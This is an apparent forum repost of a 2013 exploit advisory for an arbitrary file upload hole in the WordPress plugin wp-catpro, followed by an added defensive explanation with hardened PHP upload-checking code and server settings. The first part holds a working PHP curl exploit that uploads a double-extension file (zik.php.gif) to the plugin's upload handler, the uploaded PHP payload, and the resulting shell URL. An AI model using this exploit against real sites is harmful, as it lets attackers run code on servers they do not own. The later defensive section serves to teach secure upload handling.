中国网络渗透测试联盟

Title: WordPress plugin wp-catpro arbitrary file upload

Author: admin    Time: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------#

Author  => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit information:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
// Upload a file whose name ends in an allowed extension (.gif) but also
// carries .php, so the web server may still execute it.
$uploadfile = "zik.php.gif";

$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array(
        // "@file" is the pre-PHP 5.5 upload syntax; newer PHP needs CURLFile
        'Filedata' => class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile",
        // destination directory the handler writes into
        'folder'   => '/wp-content/uploads/catpro/'
    ));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

Contents of zik.php.gif (the uploaded file):
<?php
phpinfo();
?>
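The root cause the advisory relies on, shown as an added example that is not code from wp-catpro or from the advisory author: an allow-list that only inspects the text after the final dot accepts zik.php.gif as a GIF, and on Apache configured with `AddHandler application/x-httpd-php .php` mod_mime applies the handler to every extension in the name, so the stored random_name.php.gif runs as PHP. The allow-list values are the ones quoted above; the functions weak_extension_ok(), strict_extension_ok(), safe_store_name() and demo(), the sample filenames and the constructed polyglot file are all hypothetical, written to show the check a hardened upload handler would make instead.

```php
<?php
// Added example, not code from wp-catpro or the advisory author (PHP 7.1+).
// Allow-list values are the ones quoted in the advisory; the checking
// logic, function names and sample filenames are hypothetical.
const ALLOWED_EXTENSIONS = ['jpg', 'gif', 'png'];

// Weak check (the pattern the exploit relies on): only the text after the
// last dot is compared, so "zik.php.gif" is accepted as a .gif.
function weak_extension_ok(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXTENSIONS, true);
}

// Strict check: one dot only, a conservative base name, allow-listed
// extension anchored at the very end (\z, so a trailing newline cannot
// slip past $). "zik.php.gif" fails on the second dot.
function strict_extension_ok(string $name): bool
{
    $exts = implode('|', array_map('preg_quote', ALLOWED_EXTENSIONS));
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\.(' . $exts . ')\z/i', $name) === 1;
}

// Better still: never reuse the client-supplied name. Derive the extension
// from the decoded image type and pick a random base name. getimagesize()
// happily accepts a GIF header followed by "<?php ...", so this does not
// make a polyglot harmless by itself; the stored name (no .php anywhere)
// and an upload directory with PHP execution disabled are what stop it.
function safe_store_name(string $tmpPath): ?string
{
    $info = @getimagesize($tmpPath);
    if ($info === false) {
        return null;                       // not a decodable image
    }
    $map = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif', IMAGETYPE_PNG => 'png'];
    $ext = $map[$info[2]] ?? null;
    if ($ext === null) {
        return null;                       // decodable, but not an allowed type
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Run both name checks over constructed filenames, including the
// advisory's double-extension payload.
function demo(): array
{
    $names = ['photo.gif', 'zik.php.gif', 'shell.php', 'evil.gif.php', 'a b.GIF'];
    $out = [];
    foreach ($names as $n) {
        $out[$n] = ['weak' => weak_extension_ok($n), 'strict' => strict_extension_ok($n)];
    }
    return $out;
}

if (PHP_SAPI === 'cli') {
    // Constructed polyglot: minimal GIF header, then PHP. getimagesize()
    // still reports a GIF, so safe_store_name() assigns a random .gif name.
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, "GIF89a\x01\x00\x01\x00\x00\x00\x00<?php phpinfo(); ?>");
    var_export(demo());
    echo "\n", safe_store_name($tmp) ?? 'rejected', "\n";
    unlink($tmp);
}
```

In demo(), zik.php.gif and "a b.GIF" pass the weak check and fail the strict one; shell.php and evil.gif.php fail both. The name check is only half of the fix: serve wp-content/uploads with PHP disabled (on Apache, bind the PHP handler with `<FilesMatch "\.php$">` rather than AddHandler, and deny .php files under uploads) so that a name that slips through is still not executed.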




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2